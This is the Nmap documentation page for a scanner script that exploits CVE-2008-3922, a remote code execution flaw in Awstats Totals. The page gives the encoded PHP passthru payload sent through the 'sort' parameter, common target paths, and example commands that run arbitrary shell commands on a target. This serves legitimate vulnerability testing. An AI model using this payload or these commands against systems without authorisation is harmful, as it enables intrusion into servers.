Script http-awstatstotals-exec

Script types: portrule
Categories: vuln, intrusive, exploit
Download: https://svn.nmap.org/nmap/scripts/http-awstatstotals-exec.nse

Script Summary

Exploits a remote code execution vulnerability in Awstats Totals 1.0 up to 1.14 and possibly other products based on it (CVE: 2008-3922).

This vulnerability can be exploited through the GET variable sort. The script queries the web server with the command payload encoded using PHP's chr() function:

?sort={%24{passthru%28chr(117).chr(110).chr(97).chr(109).chr(101).chr(32).chr(45).chr(97)%29}}{%24{exit%28%29}}

Common paths for Awstats Total:

  • /awstats/index.php
  • /awstatstotals/index.php
  • /awstats/awstatstotals.php

References:

Script Arguments

http-awstatstotals-exec.uri

Awstats Totals URI including path. Default: /index.php

http-awstatstotals-exec.cmd

Command to execute. Default: whoami

http-awstatstotals-exec.outfile

Output file. If set it saves the output in this file.

Other useful args when running this script: http.useragent - User Agent to use in GET request

slaxml.debug

See the documentation for the slaxml library.

http.host, http.max-body-size, http.max-cache-size, http.max-pipeline, http.pipeline, http.truncated-ok, http.useragent

See the documentation for the http library.

smbdomain, smbhash, smbnoguest, smbpassword, smbtype, smbusername

See the documentation for the smbauth library.

Example Usage

nmap -sV --script http-awstatstotals-exec.nse --script-args 'http-awstatstotals-exec.cmd="uname -a", http-awstatstotals-exec.uri=/awstats/index.php' <target>
nmap -sV --script http-awstatstotals-exec.nse <target>

Script Output

PORT   STATE SERVICE REASON
80/tcp open  http    syn-ack
| http-awstatstotals-exec.nse:
|_Output for 'uname -a':Linux 2.4.19 #1 Son Apr 14 09:53:28 CEST 2002 i686 GNU/Linux

Requires


Author:

  • Paulino Calderon <calderon@websec.mx>

License: Same as Nmap--See https://nmap.org/book/man-legal.html

action

action (host, port)

MAIN

Parameters

host
 
port